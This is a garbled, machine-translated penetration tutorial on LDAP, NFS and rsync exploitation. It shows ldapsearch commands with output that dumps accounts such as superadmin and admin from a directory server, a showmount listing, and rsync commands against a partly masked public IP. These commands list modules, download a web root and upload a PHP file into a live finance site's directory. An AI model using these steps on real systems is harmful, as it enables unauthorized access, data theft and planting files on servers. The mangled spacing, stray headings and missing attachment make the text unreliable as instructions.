I. ldap penetration Skills 1. catetcnsswitch: Check the Password Logon Policy. We can see that fileldap mode is used. 2. lessetcldap. confbaseouPeople, dcunix-center, dcnet find ou, dc, dc settings 3. ldapsearch-x-Dcnadministrator, cnPeople, dcunix-c
1. ldap penetration skills
1.Cat/Etc/nsswitch
Check the Password Logon Policy. We can see that the password is used.FileLdap Mode
2.Less/Etc/ldap. conf
Base ou = People, dc = unix-center, dc = net
Locate ou, dc, and dc settings
3. Search for administrator Information
Anonymous Mode
Ldapsearch-x-D "cn = adminisTrAtor, cn = People, dc = unix-center, dc = net "-B" cn = administrator, cn = People, dc = unix-center, dc = net "-h 192.168.2.2
Password format
Ldapsearch-x-W-D "cn = administrator, cn = People, dc = unix-center, dc = net"-B "cn = administrator, cn = People, dc = unix-center, dc = net "-h 192.168.2.2
4. Search for 10 user records
Ldapsearch-h 192.168.2.2-x-z 10-p specified port
Practice:
1. cat/etc/nsswitch
Check the Password Logon Policy. We can see that the file ldap mode is used.
2. less/etc/ldap. conf
Base ou = People, dc = unix-center, dc = net
Locate ou, dc, and dc settings
3. Search for administrator Information
Anonymous Mode
Ldapsearch-x-D "cn = administrator, cn = People, dc = unix-center, dc = net"-B "cn = administrator, cn = People, dc = unix-center, dc = net "-h 192.168.2.2
Password format
Ldapsearch-x-W-D "cn = administrator, cn = People, dc = unix-center, dc = net"-B "cn = administrator, cn = People, dc = unix-center, dc = net "-h 192.168.2.2
4. Search for 10 user records
Ldapsearch-h 192.168.2.2-x-z 10-p specified port
Penetration Practice:
1. Return all attributes
Ldapsearch-h 192.168.7.33-B "dc = ruc, dc =EdU, dc = cn "-sSuB "objectclass = *"
Version: 1
Dn: dc = ruc, dc = eDu, Dc = cn
Dc: ruc
ObjectClass: domain
Dn: uId= Manager, dc = ruc, dc = edu, dc = cn
Uid: manager
ObjectClass: inetOrgPerson
ObjectClass: organizationalPerson
ObjectClass: person
ObjectClass: top
Sn: manager
Cn: manager
Dn: uid = superadmin, dc = ruc, dc = edu, dc = cn
Uid: superadmin
ObjectClass: inetOrgPerson
ObjectClass: organizationalPerson
ObjectClass: person
ObjectClass: top
Sn: superadmin
Cn: superadmin
Dn: uid = admin, dc = ruc, dc = edu, dc = cn
Uid: admin
ObjectClass: inetOrgPerson
ObjectClass: organizationalPerson
ObjectClass: person
ObjectClass: top
Sn: admin
Cn: admin
Dn: uid = dCp_ Anonymous, dc = ruc, dc = edu, dc = cn
Uid: dcp_anonymous
ObjectClass: top
ObjectClass: person
ObjectClass: organizationalPerson
ObjectClass: inetOrgPerson
Sn: dcp_anonymous
Cn: dcp_anonymous
2. view the base class
Bash-3.00 # ldapsearch-h 192.168.7.33-B "dc = ruc, dc = edu, dc = cn"-s base "objectclass = *" |More
Version: 1
Dn: dc = ruc, dc = edu, dc = cn
Dc: ruc
ObjectClass: domain
3. Search
Bash-3.00 # ldapsearch-h 192.168.7.33-B ""-s base "objectclass = *"
Version: 1
Dn:
ObjectClass: top
NamingContExTs: dc = ruc, dc = edu, dc = cn
SupportedExtension: 2.16.840.1.113730.3.5.7
SupportedExtension: 2.16.840.1.113730.3.5.8
SupportedExtension: 1.3.6.1.4.1.4203.1.11.1
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
SupportedExtension: 2.16.840.1.113730.3.5.3
SupportedExtension: 2.16.840.1.113730.3.5.5
SupportedExtension: 2.16.840.1.113730.3.5.6
SupportedExtension: 2.16.840.1.113730.3.5.4
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
SupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
SupportedExtension: 1.3.6.1.4.1.1466.20037
SupportedExtension: 1.3.6.1.4.1.4203.1.11.3
SupportedControl: 2.16.840.1.113730.3.4.2
SupportedControl: 2.16.840.1.113730.3.4.3
SupportedControl: 2.16.840.1.113730.3.4.4
SupportedControl: 2.16.840.1.113730.3.4.5
SupportedControl: 1.2.840.113556.1.4.473
SupportedControl: 2.16.840.1.113730.3.4.9
SupportedControl: 2.16.840.1.113730.3.4.16
SupportedControl: 2.16.840.1.113730.3.4.15
SupportedControl: 2.16.840.1.113730.3.4.17
SupportedControl: 2.16.840.1.113730.3.4.19
SupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
SupportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
SupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
SupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
SupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
SupportedControl: 2.16.840.1.113730.3.4.14
SupportedControl: 1.3.6.1.4.1.1466.29539.12
SupportedControl: 2.16.840.1.113730.3.4.12
SupportedControl: 2.16.840.1.113730.3.4.18
SupportedControl: 2.16.840.1.113730.3.4.13
Supportedsaslmechanic ISMs: EXTERNAL
Supportedsaslmechanic ISMs: DIGEST-MD5
SupportedLDAPVersion: 2
SupportedLDAPVersion: 3
VendorName: Sun Microsystems, INc.
VendorVersion: Sun-Java (tm)-System-Directory/6.2
Dataversion: 020090516011411
Netscapemdsuffix: cn = ldap: // dc = webA: 389
SupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
SupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
SupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
SupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
SupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
SupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
SupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
SupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
SupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
SupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
SupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
SupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
SupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
SupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
SupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
SupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
SupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
SupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
SupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
SupportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
SupportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
SupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
SupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
SupportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
SupportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
SupportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
SupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
SupportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
SupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
SupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
For the scripts used for penetration, see the attachment.
Ii. NFS penetration skills
Showmount-e ip
List IP addresses
Penetration Animation:
Iii. rSyncPenetration skills
1. view the list on the rsync server
Rsync 210.51.X.X ::
Finance
Img_finance
Auto
Img_auto
Html_cms
Img_cms
Ent_cms
Ent_img
Ceshi
Res_img
Res_img_c2
Chip
Chip_c2
Ent_icms
Games
Gamesimg
Media
Mediaimg
Fashion
Res-fashion
Res-fo
Taobao-home
Res-taobao-home
House
Res-house
Res-home
Res-edu
Res-ent
Res-labs
Res-news
Res-phtv
Res-media
Home
Edu
News
Res-book
View the corresponding sub-directories (note that you must add the directory /)
Rsync 210.51.X.X: htdocs_app/
Rsync 210.51.X.X: auto/
Rsync 210.51.X.X: edu/
2. Download the configuration file on the rsync server
Rsync-avz 210.51.X.X: htdocs_app // tmp/app/
3. Update the rsync file upwards (uploaded successfully, not overwritten)
Rsync-avz nothack.Php210.51.X.X: htdocs_app/warn/
Http://app.finance.xxx.com/warn/nothack.txt